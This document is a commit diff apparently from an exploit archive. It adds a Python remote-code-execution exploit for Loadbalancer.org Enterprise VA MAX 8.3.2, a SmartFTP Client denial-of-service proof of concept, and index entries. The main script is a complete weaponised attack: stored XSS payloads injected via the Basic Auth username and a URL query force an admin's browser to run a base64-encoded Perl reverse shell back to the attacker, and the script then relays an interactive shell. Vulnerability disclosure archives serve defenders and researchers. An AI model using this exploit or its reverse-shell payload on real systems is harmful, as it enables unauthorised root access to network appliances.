DB: 2018-11-01

2 changes to exploits/shellcodes SmartFTP Client 9.0.2615.0 - Denial of Service (PoC) Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution
2018-11-01 05:01:53 +00:00 · 2018-11-01 05:01:53 +00:00 · fb45f84056
commit fb45f84056
parent ef70ec156b
3 changed files with 120 additions and 0 deletions
--- a/exploits/php/webapps/45758.py
+++ b/exploits/php/webapps/45758.py
@ -0,0 +1,97 @@
+# Exploit Title: Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution
+# Date: 2018-07-24
+# Exploit Authors: Jakub Palaczynski
+# Vendor Homepage: https://www.loadbalancer.org/
+# Version: <= 8.3.2
+# CVE: N/A
+
+# Exploit Description: Loadbalancer.org Enterprise VA MAX - Remote Code Execution via Unauthenticated Stored XSS
+# Info: It is advised to use HTTPS port instead of HTTP for sending payloads as storing JavaScript in "Apache Error Log" does not work for HTTP.
+# Info: JavaScript can be easily changed to for example modify SSH configuration or add/modify web users
+
+# Basic Information:
+# Two instances of Stored XSS were found - exploit uses both:
+# 1. It is possible to inject custom JavaScript code during authentication to "/lbadmin/".
+# Application takes input from Basic Auth (username) and stores it without encoding/sanitization/filtering in "Apache Error Log".
+# This instance only forks for HTTPS.
+# 2. It is possible to inject custom JavaScript code by accessing URL like /?<XSS>.
+# Such JavaScript is stored in "Apache User Log".
+
+# This way attacker can store JavaScript code that can for example execute system command as root. This is actually what this exploit does - spawns reverse shell.
+# When application user browses "Apache Error Log" or "Apache User Log" custom JavaScript code gets automatically executed.
+
+
+#!/usr/bin/python
+
+import socket
+import sys
+import os
+import threading
+import subprocess
+import time
+import base64
+
+# print help or assign arguments
+if len(sys.argv) != 3:
+    sys.stderr.write("[-]Usage: python %s <our_ip:port> <proto://remote_ip:port>\n" % sys.argv[0])
+    sys.stderr.write("[-]Exemple: python %s 192.168.1.1:80 https://192.168.1.2:9443\n" % sys.argv[0])
+    sys.exit(1)
+
+lhost = sys.argv[1] # our ip address and port
+rhost = sys.argv[2] # ip address and port of vulnerable Loadbalancer
+raw = """perl -e 'use Socket;$i=\"""" + lhost.split(":")[0] + """\";$p=""" + lhost.split(":")[1] + """;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" # raw reverse shell in perl
+payload_url = 'document.getElementById("lb").contentDocument.forms[0].elements["command"].value = "echo ' + base64.b64encode(raw.encode("ascii")) + ' | base64 -d | bash";document.getElementById("lb").contentDocument.forms[0].submit();' # base64 encoded reverse shell in perl
+payload_auth = "<iframe id='lb'/src='/lbadmin/config/command.php'/style='width&colon;0;height&colon;0;border&colon;0;border&colon;none;'/onload=eval(atob('" + base64.b64encode(payload_url.encode("ascii")) + "'))></iframe>:pwd" # base64 encoded reverse shell in perl
+
+# for additional thread to send request in parallel
+class requests (threading.Thread):
+    def run(self):
+        time.sleep(5)
+	# send requests to trigger vulnerability
+	os.system('curl -s -k -m 10 -X "GET" -H "Authorization: Basic ' + base64.b64encode(payload_auth.encode("ascii")) + '" "' + rhost + '/lbadmin/" > /dev/null') # store payload in Apache Error logs
+	os.system('curl -s -k -m 10 -X "GET" "' + rhost + '/?<iframe/id=\'lb\'/src=\'/lbadmin/config/command.php\'/onload=\'eval(atob(\`' + base64.b64encode(payload_url.encode("ascii")) + '\`))\'/style=\'width:0;height:0;border:0;border:none;\'></iframe>" > /dev/null') # store payload in Apache User logs
+
+# for additional thread to receive data from socket
+class receiving (threading.Thread):
+    def __init__(self, conn):
+        threading.Thread.__init__(self)
+        self.conn = conn
+	self._is_running = True
+    def stop(self):
+	self._is_running = False
+    def run(self):
+        while (self._is_running):
+            cmd = conn.recv(1024)
+            sys.stdout.write(cmd)
+            sys.stdout.flush()
+	    if cmd == '':
+		break
+	threadr.stop()
+
+# function that creates socket
+def create_socket(port):
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+    sock.bind(('0.0.0.0', port))
+    sock.listen(10)
+    conn, addr = sock.accept()
+    return sock, conn, addr
+
+# start thread that sends request
+print 'Sending requests that triggers vulnerability.'
+thread = requests()
+thread.start()
+
+# create socket to receive shell
+print 'Now you need to wait for shell.'
+sock, conn, addr = create_socket(int(lhost.split(":")[1]))
+threadr = receiving(conn)
+threadr.start()
+while True:
+    cmd = raw_input("")
+    if cmd == 'exit':
+	conn.send(cmd + "\n")
+        break
+    else:
+        conn.send(cmd + "\n")
+sock.close()
--- a/exploits/windows_x86-64/dos/45759.py
+++ b/exploits/windows_x86-64/dos/45759.py
@ -0,0 +1,21 @@
+#Exploit Title: SmartFTP Client 9.0.2615.0 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2018-10-30
+#Vendor Homepage: https://www.smartftp.com/en-us/
+#Software Link: https://www.smartftp.com/en-us/download
+#Tested Version: 9.0.2615.0
+#Tested on: Windows 10 Single Language x64
+
+#Steps to produce the crash:
+#1.- Run python code: SmartFTP_9.0.2615.0_Denial_of_Service_(PoC).py
+#2.- Open network.txt and copy content to clipboard
+#2.- Open SmartFTP Client
+#3.- Select Connection
+#4.- Paste ClipBoard on "Host" 
+#5.- Crashed
+
+cod = "\x41" * 300
+
+f = open('network.txt', 'w')
+f.write(cod)
+f.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6168,6 +6168,7 @@ id,file,description,date,author,type,platform,port
 45746,exploits/hardware/dos/45746.php,"ZyXEL VMG3312-B10B < 1.00(AAPP.7) - Credential Disclosure",2018-10-30,"numan türle",dos,hardware,21
 45749,exploits/windows/dos/45749.py,"QNAP NetBak Replicator 4.5.6.0607 - Denial of Service (PoC)",2018-10-30,"Yair Rodríguez Aparicio",dos,windows,
 45750,exploits/linux/dos/45750.txt,"SIPp 3.3.990 - Local Buffer Overflow (PoC)",2018-10-30,"Nawaf Alkeraithe",dos,linux,
+45759,exploits/windows_x86-64/dos/45759.py,"SmartFTP Client 9.0.2615.0 - Denial of Service (PoC)",2018-10-31,"Victor Mondragón",dos,windows_x86-64,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -40267,3 +40268,4 @@ id,file,description,date,author,type,platform,port
 45755,exploits/jsp/webapps/45755.txt,"Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal",2018-10-30,"Rafael Pedrero",webapps,jsp,80
 45756,exploits/php/webapps/45756.txt,"Asaancart Simple PHP Shopping Cart 0.9 - Arbitrary File Upload / SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80
 45757,exploits/php/webapps/45757.txt,"CI User Login and Management 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80
+45758,exploits/php/webapps/45758.py,"Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution",2018-10-31,"Jakub Palaczynski",webapps,php,